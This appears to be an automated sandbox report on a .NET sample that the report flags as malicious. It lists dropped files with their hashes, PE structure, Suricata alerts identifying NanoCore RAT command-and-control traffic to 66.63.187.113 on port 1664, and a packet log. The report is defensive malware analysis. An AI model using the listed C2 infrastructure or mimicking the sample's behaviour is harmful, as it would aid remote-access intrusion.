Entropy (8bit):	3.0
Encrypted:	false
SSDEEP:	3:kRL:kt
MD5:	693CD7C329937F21899E0FC91AF4E8DD
SHA1:	785F2FDD1816F480821DDF87A40A58DAC2F26EF3
SHA-256:	816C28E65CF467578847F40590BF4472D5F107CDA53669F231F168B7CECAB3E1
SHA-512:	3B2CF3940F41249B5FB1FB27491745286127612C50A2086767BBB528CD28AFE3F80E524236FF19225D0F692EE0D72747E6F6869CF78676CE9CC4C90A2BAE5D52
Malicious:	true
Preview:	3.4..H

C:\Users\user\AppData\Roaming\9E146BE9-C76A-4720-BCDB-53011B87BD06\settings.bin

Download File

Process:	C:\Users\user\Desktop\nD2ozRD7MN.exe
File Type:	data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	5.153055907333276
Encrypted:	false
SSDEEP:	3:9bzY6oRDT6P2bfVn1:RzWDT621
MD5:	4E5E92E2369688041CC82EF9650EDED2
SHA1:	15E44F2F3194EE232B44E9684163B6F66472C862
SHA-256:	F8098A6290118F2944B9E7C842BD014377D45844379F863B00D54515A8A64B48
SHA-512:	1B368018907A3BC30421FDA2C935B39DC9073B9B1248881E70AD48EDB6CAA256070C1A90B97B0F64BBE61E316DBB8D5B2EC8DBABCD0B0B2999AB50B933671ECB
Malicious:	false
Preview:	9iH...}Z.4..f.~a........~.~.......3.U.

C:\Users\user\AppData\Roaming\9E146BE9-C76A-4720-BCDB-53011B87BD06\storage.dat

Download File

Process:	C:\Users\user\Desktop\nD2ozRD7MN.exe
File Type:	data
Category:	dropped
Size (bytes):	327768
Entropy (8bit):	7.999367066417797
Encrypted:	true
SSDEEP:	6144:oX44S90aTiB66x3PlZmqze1d1wI8lkWmtjJ/3Exi:LkjbU7LjGxi
MD5:	2E52F446105FBF828E63CF808B721F9C
SHA1:	5330E54F238F46DC04C1AC62B051DB4FCD7416FB
SHA-256:	2F7479AA2661BD259747BC89106031C11B3A3F79F12190E7F19F5DF65B7C15C8
SHA-512:	C08BA0E3315E2314ECBEF38722DF834C2CB8412446A9A310F41A8F83B4AC5984FCC1B26A1D8B0D58A730FDBDD885714854BDFD04DCDF7F582FC125F552D5C3CA
Malicious:	false
Preview:	pT..!..W..G.J..a.).@.i..wpK.so@...5.=.^..Q.oy.=e@9.B...F..09u"3.. 0t..RDn_4d.....E...i......~...\|..fX_...Xf.p^......>a..$...e.6:7d.(a.A...=.).....{B.[...y%...i.Q.<..xt.X..H.. ..HF7g...I.3.{.n....L.y;i..s-....(5i...........J.5b7}..fK..HV..,...0.... ....n.w6PMl.......v."".v.......#..X.a....../...cC...i..l{>5n.._+.e.d'...}...[..../...D.t..GVp.zz......(...o......b...+`J.{....hS1G.^I..v&.jm.#u..1..Mg!.E..U.T.....6.2>...6.l.K.w"o..E..."K%{....z.7....<...,....]t.:.....[.Z.u...3X8.QI..j_.&..N..q.e.2...6.R.~..9.Bq..A.v.6.G..#y.....O....Z)G...w..E..k(....+..O..........Vg.2xC......O...jc.....z..~.P...q../.-.'.h.._.cj.=..B.x.Q9.pu.\|i4...i...;O...n.?.,. ....v?.5}.OY@.dG\|<.._[.69@.2..m..I..oP=...xrK.?............b..5....i&...l.c\b}..Q..O+.V.mJ.....pz....>F.......H...6$...d...\|m...N..1.R..B.i..........$....$........CY}..$....r.....H...8...li.....7 P......?h....R.iF..6...q(.@LI.s..+K.....?m..H....*. l..&<}....`\|.B....3.....I..o...u1..8i=.z.W..7

C:\Users\user\AppData\Roaming\9E146BE9-C76A-4720-BCDB-53011B87BD06\task.dat

Download File

Process:	C:\Users\user\Desktop\nD2ozRD7MN.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	38
Entropy (8bit):	4.313459750171825
Encrypted:	false
SSDEEP:	3:oNUWJRWLYhP0C:oNNJAYPJ
MD5:	6B0C915DD5C87F98D49562607D100EF7
SHA1:	CC7864FC87F79207C10732218685FB60B9885ECB
SHA-256:	88BEA43F8FAF66BE2B59373289C49C2F0F4B3733A03B39FFD9A0B1012EE6C28D
SHA-512:	C2D88AC88D13314DB23172E88E506124AA7E7E8CB6C6CE5AB57BAFFD29ED56A0CEA145BCBDAA2F4951CFE0C8D43BEC272589DCCF91EA15B4C61EE92C57C22AB0
Malicious:	false
Preview:	C:\Users\user\Desktop\nD2ozRD7MN.exe

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.421647180680624
Encrypted:	false
SSDEEP:	6144:7Svfpi6ceLP/9skLmb0OTLWSPHaJG8nAgeMZMMhA2fX4WABlEnNA0uhiTw:mvloTLW+EZMM6DFyC03w
MD5:	5CD53E7750310FBF032C4055C30CC846
SHA1:	3632D3FC9E1E3BDF0B1ECFE25DE3450ACF9A39B3
SHA-256:	120FA2CC8DFAC9E0AC0062C539AA9BC48712CC3B3D56D163A7243D073EE46F55
SHA-512:	47C9C9D548825843FB38AB7690D4AF877B342D92B39DC25262FFD267C82880F0693FBF93ECF899B1B52D70B8B9CDEE194163505C61444EB31F12B5DA283CF6E4
Malicious:	false
Preview:	regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..R..,..............................................................................................................................................................................................................................................................................................................................................9.E.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.686909804415201
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.80% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Generic Win/DOS Executable (2004/3) 0.01%
File name:	nD2ozRD7MN.exe
File size:	776'192 bytes
MD5:	8e2827146c4c433affba78c88fd685db
SHA1:	de632114a70a9ad4b16ed686e48477f398531ae0
SHA256:	058e2c02b8cfb93b480ea8cfac08e967b39631a579256ebee27fb7472194c1ea
SHA512:	ba45a34ecb7d176392c43cd8b80d8181e77f1cc6536459163439a4456389a6208e053bc6a449f7974595d44b69a269833958bfe1ede7498f31538b84ddbff151
SSDEEP:	12288:fn9InteYPjOFGGCA2ythZoESN0vXMgmW3oSrnvuiYZftZvskj2/Q4AyrrRPdh:fEPtpy/2ESNimW3oovZYB2o4JPd
TLSH:	23F4BED03A36771ADEA94BB59558DDB643F21968B001FAE61DD93BCB359C300AE48F03
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....#g..............0......(........... ........@.. .......................@............@................................

File Icon


Icon Hash:	cd7050787870e4d2

Static PE Info

General

Entrypoint:	0x4bcbea
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x6723970B [Thu Oct 31 14:41:15 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
push ebx
add byte ptr [ecx+00h], bh
jnc 00007FCC4C7E8A22h
je 00007FCC4C7E8A22h
add byte ptr [ebp+00h], ch
add byte ptr [ecx+00h], al
arpl word ptr [eax], ax
je 00007FCC4C7E8A22h
imul eax, dword ptr [eax], 00610076h
je 00007FCC4C7E8A22h
outsd
add byte ptr [edx+00h], dh
inc edx
add byte ptr [ecx+00h], ah
jc 00007FCC4C7E8A22h
bound eax, dword ptr [eax]
add byte ptr [edx+00h], dh
jnc 00007FCC4C7E8A22h
push 70006F00h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xbcb98	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xbe000	0x25a4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xc2000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xbac28	0xbae00	e812666de259c78d5efc17ecf9cb836e	False	0.8399443457357859	data	7.690214537258505	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xbe000	0x25a4	0x2600	ca4443345c86466d3a1b2d54cbc61f1f	False	0.8831208881578947	data	7.56328477001297	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xc2000	0xc	0x200	7465f9d6b86601e5c0655a6bd449e1f1	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xbe0c8	0x2185	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9455774385269782
RT_GROUP_ICON	0xc0260	0x14	data	1.05
RT_VERSION	0xc0284	0x31c	data	0.4472361809045226

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-01T06:18:58.053284+0100	2025019	ET MALWARE Possible NanoCore C2 60B	1	192.168.2.5	49707	66.63.187.113	1664	TCP
2024-11-01T06:18:58.936669+0100	2046914	ET MALWARE NanoCore RAT CnC 7	1	192.168.2.5	49707	66.63.187.113	1664	TCP
2024-11-01T06:18:58.936669+0100	2822326	ETPRO MALWARE NanoCore RAT CnC 19	1	192.168.2.5	49707	66.63.187.113	1664	TCP
2024-11-01T06:19:00.089903+0100	2046914	ET MALWARE NanoCore RAT CnC 7	1	192.168.2.5	49707	66.63.187.113	1664	TCP
2024-11-01T06:19:00.089903+0100	2822326	ETPRO MALWARE NanoCore RAT CnC 19	1	192.168.2.5	49707	66.63.187.113	1664	TCP
2024-11-01T06:19:05.438985+0100	2025019	ET MALWARE Possible NanoCore C2 60B	1	192.168.2.5	49710	66.63.187.113	1664	TCP
2024-11-01T06:19:06.283817+0100	2046914	ET MALWARE NanoCore RAT CnC 7	1	192.168.2.5	49710	66.63.187.113	1664	TCP
2024-11-01T06:19:06.283817+0100	2822326	ETPRO MALWARE NanoCore RAT CnC 19	1	192.168.2.5	49710	66.63.187.113	1664	TCP
2024-11-01T06:19:07.281024+0100	2046914	ET MALWARE NanoCore RAT CnC 7	1	192.168.2.5	49710	66.63.187.113	1664	TCP
2024-11-01T06:19:07.281024+0100	2822326	ETPRO MALWARE NanoCore RAT CnC 19	1	192.168.2.5	49710	66.63.187.113	1664	TCP
2024-11-01T06:19:07.336174+0100	2025019	ET MALWARE Possible NanoCore C2 60B	1	192.168.2.5	49710	66.63.187.113	1664	TCP
2024-11-01T06:19:12.328544+0100	2025019	ET MALWARE Possible NanoCore C2 60B	1	192.168.2.5	49713	66.63.187.113	1664	TCP
2024-11-01T06:19:12.333818+0100	2046914	ET MALWARE NanoCore RAT CnC 7	1	192.168.2.5	49713	66.63.187.113	1664	TCP
2024-11-01T06:19:12.333818+0100	2822326	ETPRO MALWARE NanoCore RAT CnC 19	1	192.168.2.5	49713	66.63.187.113	1664	TCP
2024-11-01T06:19:13.326855+0100	2046914	ET MALWARE NanoCore RAT CnC 7	1	192.168.2.5	49713	66.63.187.113	1664	TCP
2024-11-01T06:19:13.326855+0100	2822326	ETPRO MALWARE NanoCore RAT CnC 19	1	192.168.2.5	49713	66.63.187.113	1664	TCP
2024-11-01T06:19:13.634947+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	4.245.163.56	443	192.168.2.5	49711	TCP
2024-11-01T06:19:14.166101+0100	2025019	ET MALWARE Possible NanoCore C2 60B	1	192.168.2.5	49713	66.63.187.113	1664	TCP
2024-11-01T06:19:18.348337+0100	2025019	ET MALWARE Possible NanoCore C2 60B	1	192.168.2.5	49729	66.63.187.113	1664	TCP
2024-11-01T06:19:19.326895+0100	2046914	ET MALWARE NanoCore RAT CnC 7	1	192.168.2.5	49729	66.63.187.113	1664	TCP
2024-11-01T06:19:19.326895+0100	2822326	ETPRO MALWARE NanoCore RAT CnC 19	1	192.168.2.5	49729	66.63.187.113	1664	TCP
2024-11-01T06:19:20.200101+0100	2025019	ET MALWARE Possible NanoCore C2 60B	1	192.168.2.5	49729	66.63.187.113	1664	TCP
2024-11-01T06:19:24.364629+0100	2025019	ET MALWARE Possible NanoCore C2 60B	1	192.168.2.5	49760	66.63.187.113	1664	TCP
2024-11-01T06:19:24.373797+0100	2046914	ET MALWARE NanoCore RAT CnC 7	1	192.168.2.5	49760	66.63.187.113	1664	TCP
2024-11-01T06:19:24.373797+0100	2822326	ETPRO MALWARE NanoCore RAT CnC 19	1	192.168.2.5	49760	66.63.187.113	1664	TCP
2024-11-01T06:19:25.373809+0100	2046914	ET MALWARE NanoCore RAT CnC 7	1	192.168.2.5	49760	66.63.187.113	1664	TCP
2024-11-01T06:19:25.373809+0100	2822326	ETPRO MALWARE NanoCore RAT CnC 19	1	192.168.2.5	49760	66.63.187.113	1664	TCP
2024-11-01T06:19:25.999606+0100	2046909	ET MALWARE NanoCore RAT Keepalive Response 1	1	66.63.187.113	1664	192.168.2.5	49760	TCP
2024-11-01T06:19:26.212247+0100	2025019	ET MALWARE Possible NanoCore C2 60B	1	192.168.2.5	49760	66.63.187.113	1664	TCP
2024-11-01T06:19:30.402479+0100	2025019	ET MALWARE Possible NanoCore C2 60B	1	192.168.2.5	49794	66.63.187.113	1664	TCP
2024-11-01T06:19:30.477669+0100	2046914	ET MALWARE NanoCore RAT CnC 7	1	192.168.2.5	49794	66.63.187.113	1664	TCP
2024-11-01T06:19:30.477669+0100	2816718	ETPRO MALWARE NanoCore RAT Keep-Alive Beacon	1	192.168.2.5	49794	66.63.187.113	1664	TCP
2024-11-01T06:19:30.477669+0100	2822326	ETPRO MALWARE NanoCore RAT CnC 19	1	192.168.2.5	49794	66.63.187.113	1664	TCP
2024-11-01T06:19:31.467571+0100	2046914	ET MALWARE NanoCore RAT CnC 7	1	192.168.2.5	49794	66.63.187.113	1664	TCP
2024-11-01T06:19:31.467571+0100	2822326	ETPRO MALWARE NanoCore RAT CnC 19	1	192.168.2.5	49794	66.63.187.113	1664	TCP
2024-11-01T06:19:32.246562+0100	2025019	ET MALWARE Possible NanoCore C2 60B	1	192.168.2.5	49794	66.63.187.113	1664	TCP
2024-11-01T06:19:36.492343+0100	2025019	ET MALWARE Possible NanoCore C2 60B	1	192.168.2.5	49827	66.63.187.113	1664	TCP
2024-11-01T06:19:36.500112+0100	2046914	ET MALWARE NanoCore RAT CnC 7	1	192.168.2.5	49827	66.63.187.113	1664	TCP
2024-11-01T06:19:36.500112+0100	2822326	ETPRO MALWARE NanoCore RAT CnC 19	1	192.168.2.5	49827	66.63.187.113	1664	TCP
2024-11-01T06:19:37.498984+0100	2046914	ET MALWARE NanoCore RAT CnC 7	1	192.168.2.5	49827	66.63.187.113	1664	TCP
2024-11-01T06:19:37.498984+0100	2822326	ETPRO MALWARE NanoCore RAT CnC 19	1	192.168.2.5	49827	66.63.187.113	1664	TCP
2024-11-01T06:19:38.336053+0100	2025019	ET MALWARE Possible NanoCore C2 60B	1	192.168.2.5	49827	66.63.187.113	1664	TCP
2024-11-01T06:19:42.535720+0100	2025019	ET MALWARE Possible NanoCore C2 60B	1	192.168.2.5	49862	66.63.187.113	1664	TCP
2024-11-01T06:19:43.688692+0100	2046914	ET MALWARE NanoCore RAT CnC 7	1	192.168.2.5	49862	66.63.187.113	1664	TCP
2024-11-01T06:19:43.688692+0100	2822326	ETPRO MALWARE NanoCore RAT CnC 19	1	192.168.2.5	49862	66.63.187.113	1664	TCP
2024-11-01T06:19:44.450133+0100	2025019	ET MALWARE Possible NanoCore C2 60B	1	192.168.2.5	49862	66.63.187.113	1664	TCP
2024-11-01T06:19:48.743097+0100	2025019	ET MALWARE Possible NanoCore C2 60B	1	192.168.2.5	49896	66.63.187.113	1664	TCP
2024-11-01T06:19:49.719815+0100	2046914	ET MALWARE NanoCore RAT CnC 7	1	192.168.2.5	49896	66.63.187.113	1664	TCP
2024-11-01T06:19:49.719815+0100	2822326	ETPRO MALWARE NanoCore RAT CnC 19	1	192.168.2.5	49896	66.63.187.113	1664	TCP
2024-11-01T06:19:50.690817+0100	2025019	ET MALWARE Possible NanoCore C2 60B	1	192.168.2.5	49896	66.63.187.113	1664	TCP
2024-11-01T06:19:52.289721+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	4.245.163.56	443	192.168.2.5	49907	TCP
2024-11-01T06:19:54.755415+0100	2025019	ET MALWARE Possible NanoCore C2 60B	1	192.168.2.5	49931	66.63.187.113	1664	TCP
2024-11-01T06:19:54.777302+0100	2046914	ET MALWARE NanoCore RAT CnC 7	1	192.168.2.5	49931	66.63.187.113	1664	TCP
2024-11-01T06:19:54.777302+0100	2822326	ETPRO MALWARE NanoCore RAT CnC 19	1	192.168.2.5	49931	66.63.187.113	1664	TCP
2024-11-01T06:19:55.780055+0100	2046914	ET MALWARE NanoCore RAT CnC 7	1	192.168.2.5	49931	66.63.187.113	1664	TCP
2024-11-01T06:19:55.780055+0100	2822326	ETPRO MALWARE NanoCore RAT CnC 19	1	192.168.2.5	49931	66.63.187.113	1664	TCP
2024-11-01T06:19:56.631885+0100	2025019	ET MALWARE Possible NanoCore C2 60B	1	192.168.2.5	49931	66.63.187.113	1664	TCP
2024-11-01T06:20:00.868716+0100	2025019	ET MALWARE Possible NanoCore C2 60B	1	192.168.2.5	49962	66.63.187.113	1664	TCP
2024-11-01T06:20:05.832968+0100	2025019	ET MALWARE Possible NanoCore C2 60B	1	192.168.2.5	49988	66.63.187.113	1664	TCP
2024-11-01T06:20:06.077464+0100	2046914	ET MALWARE NanoCore RAT CnC 7	1	192.168.2.5	49988	66.63.187.113	1664	TCP
2024-11-01T06:20:06.077464+0100	2822326	ETPRO MALWARE NanoCore RAT CnC 19	1	192.168.2.5	49988	66.63.187.113	1664	TCP
2024-11-01T06:20:11.098540+0100	2025019	ET MALWARE Possible NanoCore C2 60B	1	192.168.2.5	49993	66.63.187.113	1664	TCP
2024-11-01T06:20:16.117228+0100	2025019	ET MALWARE Possible NanoCore C2 60B	1	192.168.2.5	49994	66.63.187.113	1664	TCP
2024-11-01T06:20:21.114434+0100	2025019	ET MALWARE Possible NanoCore C2 60B	1	192.168.2.5	49995	66.63.187.113	1664	TCP
2024-11-01T06:20:26.132572+0100	2025019	ET MALWARE Possible NanoCore C2 60B	1	192.168.2.5	49996	66.63.187.113	1664	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 1, 2024 06:18:58.040157080 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:18:58.047008991 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:18:58.047082901 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:18:58.053283930 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:18:58.060143948 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:18:58.936669111 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:18:58.943249941 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:18:58.984522104 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:18:58.986982107 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:18:58.994570017 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:18:59.286218882 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:18:59.316706896 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:18:59.321731091 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:18:59.658448935 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:18:59.658513069 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:18:59.658550024 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:18:59.658582926 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:18:59.658585072 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:18:59.658637047 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:18:59.658648014 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:18:59.827939987 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:18:59.827975035 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:18:59.827997923 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:18:59.828030109 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:18:59.828063965 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:18:59.828110933 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:18:59.828118086 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:18:59.828144073 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:18:59.828155041 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:18:59.828855991 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:18:59.828972101 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:18:59.829005957 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:18:59.829014063 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:18:59.829041004 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:18:59.829050064 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:18:59.829843998 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:18:59.829905033 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:18:59.997740030 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:18:59.997791052 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:18:59.997921944 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:18:59.997956038 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:18:59.997975111 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:18:59.997992039 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:18:59.998013973 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:18:59.998027086 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:18:59.998178959 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:18:59.998775959 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:18:59.998862028 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:18:59.998908043 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:18:59.998910904 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:18:59.999290943 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:18:59.999361038 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:18:59.999370098 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:18:59.999393940 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:18:59.999428034 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:18:59.999475002 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.000387907 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.000441074 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.000473976 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.000490904 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.000505924 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.000515938 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.076675892 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.089903116 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.094750881 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.167881012 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.167936087 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.167965889 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.168020010 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.168031931 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.168052912 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.168071985 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.168087959 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.168129921 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.168601990 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.168636084 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.168668985 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.168718100 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.168997049 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.169029951 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.169045925 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.169064045 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.169096947 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.169142008 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.169583082 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.169615984 CET	1664	49707	66.63.187.113	192.168.2.5
Nov 1, 2024 06:19:00.169666052 CET	49707	1664	192.168.2.5	66.63.187.113
Nov 1, 2024 06:19:00.169666052 CET	1664	49707	66.63.187.113	192.168.2.5
